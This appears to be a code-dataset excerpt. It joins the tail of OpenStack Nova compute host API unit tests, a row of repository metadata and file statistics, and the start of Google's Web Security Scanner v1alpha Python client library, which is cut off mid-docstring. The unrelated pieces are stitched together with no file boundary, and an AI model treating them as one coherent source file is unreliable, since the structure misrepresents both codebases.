disabled=None).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=dict(key1='val2'),
set_zones=True)
self.mox.VerifyAll()
self.assertEqual([exp_services[1]], result)
# Test w/ zone filter but no set_zones arg.
self.mox.ResetAll()
self.host_api.db.service_get_all(self.ctxt,
disabled=None).AndReturn(services)
self.mox.ReplayAll()
filters = {'availability_zone': 'nova'}
result = self.host_api.service_get_all(self.ctxt,
filters=filters)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
def test_service_get_by_compute_host(self):
self.mox.StubOutWithMock(self.host_api.db,
'service_get_by_compute_host')
self.host_api.db.service_get_by_compute_host(self.ctxt,
'fake-host').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.service_get_by_compute_host(self.ctxt,
'fake-host')
self.assertEqual('fake-response', result)
def test_service_update(self):
host_name = 'fake-host'
binary = 'nova-compute'
params_to_update = dict(disabled=True)
service_id = 42
expected_result = {'id': service_id}
self.mox.StubOutWithMock(self.host_api.db, 'service_get_by_args')
self.host_api.db.service_get_by_args(self.ctxt,
host_name, binary).AndReturn({'id': service_id})
self.mox.StubOutWithMock(self.host_api.db, 'service_update')
self.host_api.db.service_update(
self.ctxt, service_id, params_to_update).AndReturn(expected_result)
self.mox.ReplayAll()
result = self.host_api.service_update(
self.ctxt, host_name, binary, params_to_update)
self.assertEqual(expected_result, result)
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(self.host_api.db,
'instance_get_all_by_host')
self.host_api.db.instance_get_all_by_host(self.ctxt,
'fake-host').AndReturn(['fake-responses'])
self.mox.ReplayAll()
result = self.host_api.instance_get_all_by_host(self.ctxt,
'fake-host')
self.assertEqual(['fake-responses'], result)
def test_task_log_get_all(self):
self.mox.StubOutWithMock(self.host_api.db, 'task_log_get_all')
self.host_api.db.task_log_get_all(self.ctxt,
'fake-name', 'fake-begin', 'fake-end', host='fake-host',
state='fake-state').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.task_log_get_all(self.ctxt, 'fake-name',
'fake-begin', 'fake-end', host='fake-host',
state='fake-state')
self.assertEqual('fake-response', result)
class ComputeHostAPICellsTestCase(ComputeHostAPITestCase):
def setUp(self):
self.flags(compute_api_class='nova.compute.cells_api.ComputeCellsAPI')
super(ComputeHostAPICellsTestCase, self).setUp()
def _mock_rpc_call(self, expected_message, result=None):
if result is None:
result = 'fake-result'
# Wrapped with cells call
expected_message = {'method': 'proxy_rpc_to_manager',
'namespace': None,
'args': {'topic': 'compute.fake_host',
'rpc_message': expected_message,
'call': True,
'timeout': None},
'version': '1.2'}
self.mox.StubOutWithMock(rpc, 'call')
rpc.call(self.ctxt, 'cells', expected_message,
None).AndReturn(result)
def test_service_get_all_no_zones(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
fake_filters = {'key1': 'val1'}
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'service_get_all')
self.host_api.cells_rpcapi.service_get_all(self.ctxt,
filters=fake_filters).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=fake_filters)
self.assertEqual(services, result)
def test_service_get_all(self):
services = [dict(id=1, key1='val1', key2='val2', topic='compute',
host='host1'),
dict(id=2, key1='val2', key3='val3', topic='compute',
host='host2')]
exp_services = []
for service in services:
exp_service = {}
exp_service.update(availability_zone='nova', **service)
exp_services.append(exp_service)
fake_filters = {'key1': 'val1'}
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'service_get_all')
self.host_api.cells_rpcapi.service_get_all(self.ctxt,
filters=fake_filters).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=fake_filters,
set_zones=True)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
# Test w/ zone filter but no set_zones arg.
self.mox.ResetAll()
fake_filters = {'availability_zone': 'nova'}
# Zone filter is done client-size, so should be stripped
# from this call.
self.host_api.cells_rpcapi.service_get_all(self.ctxt,
filters={}).AndReturn(services)
self.mox.ReplayAll()
result = self.host_api.service_get_all(self.ctxt,
filters=fake_filters)
self.mox.VerifyAll()
self.assertEqual(exp_services, result)
def test_service_get_by_compute_host(self):
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'service_get_by_compute_host')
self.host_api.cells_rpcapi.service_get_by_compute_host(self.ctxt,
'fake-host').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.service_get_by_compute_host(self.ctxt,
'fake-host')
self.assertEqual('fake-response', result)
def test_service_update(self):
host_name = 'fake-host'
binary = 'nova-compute'
params_to_update = dict(disabled=True)
service_id = 42
expected_result = {'id': service_id}
self.mox.StubOutWithMock(self.host_api.cells_rpcapi, 'service_update')
self.host_api.cells_rpcapi.service_update(
self.ctxt, host_name,
binary, params_to_update).AndReturn(expected_result)
self.mox.ReplayAll()
result = self.host_api.service_update(
self.ctxt, host_name, binary, params_to_update)
self.assertEqual(expected_result, result)
def test_instance_get_all_by_host(self):
instances = [dict(id=1, cell_name='cell1', host='host1'),
dict(id=2, cell_name='cell2', host='host1'),
dict(id=3, cell_name='cell1', host='host2')]
self.mox.StubOutWithMock(self.host_api.db,
'instance_get_all_by_host')
self.host_api.db.instance_get_all_by_host(self.ctxt,
'fake-host').AndReturn(instances)
self.mox.ReplayAll()
expected_result = [instances[0], instances[2]]
cell_and_host = cells_utils.cell_with_item('cell1', 'fake-host')
result = self.host_api.instance_get_all_by_host(self.ctxt,
cell_and_host)
self.assertEqual(expected_result, result)
def test_task_log_get_all(self):
self.mox.StubOutWithMock(self.host_api.cells_rpcapi,
'task_log_get_all')
self.host_api.cells_rpcapi.task_log_get_all(self.ctxt,
'fake-name', 'fake-begin', 'fake-end', host='fake-host',
state='fake-state').AndReturn('fake-response')
self.mox.ReplayAll()
result = self.host_api.task_log_get_all(self.ctxt, 'fake-name',
'fake-begin', 'fake-end', host='fake-host',
state='fake-state')
self.assertEqual('fake-response', result)
| 42.328982 | 79 | 0.57587 | 1,824 | 16,212 | 4.862939 | 0.103618 | 0.053213 | 0.070688 | 0.045998 | 0.786359 | 0.77531 | 0.762683 | 0.744194 | 0.726719 | 0.705524 | 0 | 0.007761 | 0.316494 | 16,212 | 382 | 80 | 42.439791 | 0.792708 | 0.058969 | 0 | 0.72093 | 0 | 0 | 0.105017 | 0.010587 | 0 | 0 | 0 | 0 | 0.109635 | 1 | 0.076412 | false | 0 | 0.019934 | 0.003322 | 0.106312 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6ab946b3574d96dfc214417eb890451b4da41f97 | 55,887 | py | Python | websecurityscanner/google/cloud/websecurityscanner_v1alpha/gapic/web_security_scanner_client.py | q-logic/google-cloud-python | a65065c89c059bc564bbdd79288a48970907c399 | [
"Apache-2.0"
] | null | null | null | websecurityscanner/google/cloud/websecurityscanner_v1alpha/gapic/web_security_scanner_client.py | q-logic/google-cloud-python | a65065c89c059bc564bbdd79288a48970907c399 | [
"Apache-2.0"
] | 40 | 2019-07-16T10:04:48.000Z | 2020-01-20T09:04:59.000Z | websecurityscanner/google/cloud/websecurityscanner_v1alpha/gapic/web_security_scanner_client.py | q-logic/google-cloud-python | a65065c89c059bc564bbdd79288a48970907c399 | [
"Apache-2.0"
] | 2 | 2019-07-18T00:05:31.000Z | 2019-11-27T14:17:22.000Z | # -*- coding: utf-8 -*-
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.websecurityscanner.v1alpha WebSecurityScanner API."""
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.page_iterator
import google.api_core.path_template
import grpc
from google.cloud.websecurityscanner_v1alpha.gapic import enums
from google.cloud.websecurityscanner_v1alpha.gapic import (
web_security_scanner_client_config,
)
from google.cloud.websecurityscanner_v1alpha.gapic.transports import (
web_security_scanner_grpc_transport,
)
from google.cloud.websecurityscanner_v1alpha.proto import finding_pb2
from google.cloud.websecurityscanner_v1alpha.proto import scan_config_pb2
from google.cloud.websecurityscanner_v1alpha.proto import scan_run_pb2
from google.cloud.websecurityscanner_v1alpha.proto import web_security_scanner_pb2
from google.cloud.websecurityscanner_v1alpha.proto import web_security_scanner_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
"google-cloud-websecurityscanner"
).version
class WebSecurityScannerClient(object):
"""
Cloud Web Security Scanner Service identifies security vulnerabilities in web
applications hosted on Google Cloud Platform. It crawls your application, and
attempts to exercise as many user inputs and event handlers as possible.
"""
SERVICE_ADDRESS = "websecurityscanner.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.websecurityscanner.v1alpha.WebSecurityScanner"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
WebSecurityScannerClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def finding_path(cls, project, scan_config, scan_run, finding):
"""Return a fully-qualified finding string."""
return google.api_core.path_template.expand(
"projects/{project}/scanConfigs/{scan_config}/scanRuns/{scan_run}/findings/{finding}",
project=project,
scan_config=scan_config,
scan_run=scan_run,
finding=finding,
)
@classmethod
def project_path(cls, project):
"""Return a fully-qualified project string."""
return google.api_core.path_template.expand(
"projects/{project}", project=project
)
@classmethod
def scan_config_path(cls, project, scan_config):
"""Return a fully-qualified scan_config string."""
return google.api_core.path_template.expand(
"projects/{project}/scanConfigs/{scan_config}",
project=project,
scan_config=scan_config,
)
@classmethod
def scan_run_path(cls, project, scan_config, scan_run):
"""Return a fully-qualified scan_run string."""
return google.api_core.path_template.expand(
"projects/{project}/scanConfigs/{scan_config}/scanRuns/{scan_run}",
project=project,
scan_config=scan_config,
scan_run=scan_run,
)
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.WebSecurityScannerGrpcTransport,
Callable[[~.Credentials, type], ~.WebSecurityScannerGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = web_security_scanner_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=web_security_scanner_grpc_transport.WebSecurityScannerGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = web_security_scanner_grpc_transport.WebSecurityScannerGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def create_scan_config(
self,
parent,
scan_config,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Creates a new ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # TODO: Initialize `scan_config`:
>>> scan_config = {}
>>>
>>> response = client.create_scan_config(parent, scan_config)
Args:
parent (str): Required. The parent resource name where the scan is created, which should be a
project resource name in the format 'projects/{projectId}'.
scan_config (Union[dict, ~google.cloud.websecurityscanner_v1alpha.types.ScanConfig]): Required. The ScanConfig to be created.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "create_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"create_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_scan_config,
default_retry=self._method_configs["CreateScanConfig"].retry,
default_timeout=self._method_configs["CreateScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.CreateScanConfigRequest(
parent=parent, scan_config=scan_config
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["create_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def delete_scan_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Deletes an existing ScanConfig and its child resources.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> client.delete_scan_config(name)
Args:
name (str): Required. The resource name of the ScanConfig to be deleted. The name follows the
format of 'projects/{projectId}/scanConfigs/{scanConfigId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "delete_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"delete_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_scan_config,
default_retry=self._method_configs["DeleteScanConfig"].retry,
default_timeout=self._method_configs["DeleteScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.DeleteScanConfigRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
self._inner_api_calls["delete_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def get_scan_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> response = client.get_scan_config(name)
Args:
name (str): Required. The resource name of the ScanConfig to be returned. The name follows the
format of 'projects/{projectId}/scanConfigs/{scanConfigId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"get_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_scan_config,
default_retry=self._method_configs["GetScanConfig"].retry,
default_timeout=self._method_configs["GetScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.GetScanConfigRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_scan_configs(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists ScanConfigs under a given project.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # Iterate over all results
>>> for element in client.list_scan_configs(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_scan_configs(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a project resource name in the
format 'projects/{projectId}'.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_scan_configs" not in self._inner_api_calls:
self._inner_api_calls[
"list_scan_configs"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_scan_configs,
default_retry=self._method_configs["ListScanConfigs"].retry,
default_timeout=self._method_configs["ListScanConfigs"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.ListScanConfigsRequest(
parent=parent, page_size=page_size
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_scan_configs"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="scan_configs",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def update_scan_config(
self,
scan_config,
update_mask,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Updates a ScanConfig. This method support partial update of a ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> # TODO: Initialize `scan_config`:
>>> scan_config = {}
>>>
>>> # TODO: Initialize `update_mask`:
>>> update_mask = {}
>>>
>>> response = client.update_scan_config(scan_config, update_mask)
Args:
scan_config (Union[dict, ~google.cloud.websecurityscanner_v1alpha.types.ScanConfig]): Required. The ScanConfig to be updated. The name field must be set to identify the
resource to be updated. The values of fields not covered by the mask
will be ignored.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig`
update_mask (Union[dict, ~google.cloud.websecurityscanner_v1alpha.types.FieldMask]): Required. The update mask applies to the resource. For the ``FieldMask``
definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.websecurityscanner_v1alpha.types.FieldMask`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "update_scan_config" not in self._inner_api_calls:
self._inner_api_calls[
"update_scan_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_scan_config,
default_retry=self._method_configs["UpdateScanConfig"].retry,
default_timeout=self._method_configs["UpdateScanConfig"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.UpdateScanConfigRequest(
scan_config=scan_config, update_mask=update_mask
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("scan_config.name", scan_config.name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["update_scan_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def start_scan_run(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Start a ScanRun according to the given ScanConfig.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> response = client.start_scan_run(name)
Args:
name (str): Required. The resource name of the ScanConfig to be used. The name follows the
format of 'projects/{projectId}/scanConfigs/{scanConfigId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "start_scan_run" not in self._inner_api_calls:
self._inner_api_calls[
"start_scan_run"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.start_scan_run,
default_retry=self._method_configs["StartScanRun"].retry,
default_timeout=self._method_configs["StartScanRun"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.StartScanRunRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["start_scan_run"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def get_scan_run(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a ScanRun.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> name = client.scan_run_path('[PROJECT]', '[SCAN_CONFIG]', '[SCAN_RUN]')
>>>
>>> response = client.get_scan_run(name)
Args:
name (str): Required. The resource name of the ScanRun to be returned. The name follows the
format of
'projects/{projectId}/scanConfigs/{scanConfigId}/scanRuns/{scanRunId}'.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.websecurityscanner_v1alpha.types.ScanRun` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_scan_run" not in self._inner_api_calls:
self._inner_api_calls[
"get_scan_run"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_scan_run,
default_retry=self._method_configs["GetScanRun"].retry,
default_timeout=self._method_configs["GetScanRun"].timeout,
client_info=self._client_info,
)
request = web_security_scanner_pb2.GetScanRunRequest(name=name)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_scan_run"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_scan_runs(
self,
parent,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists ScanRuns under a given ScanConfig, in descending order of ScanRun
stop time.
Example:
>>> from google.cloud import websecurityscanner_v1alpha
>>>
>>> client = websecurityscanner_v1alpha.WebSecurityScannerClient()
>>>
>>> parent = client.scan_config_path('[PROJECT]', '[SCAN_CONFIG]')
>>>
>>> # Iterate over all results
>>> for element in client.list_scan_runs(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_scan_runs(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): Required. The parent resource name, which should be a scan resource name in the
format 'projects/{projectId}/scanConfigs/{scanConfigId}'.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
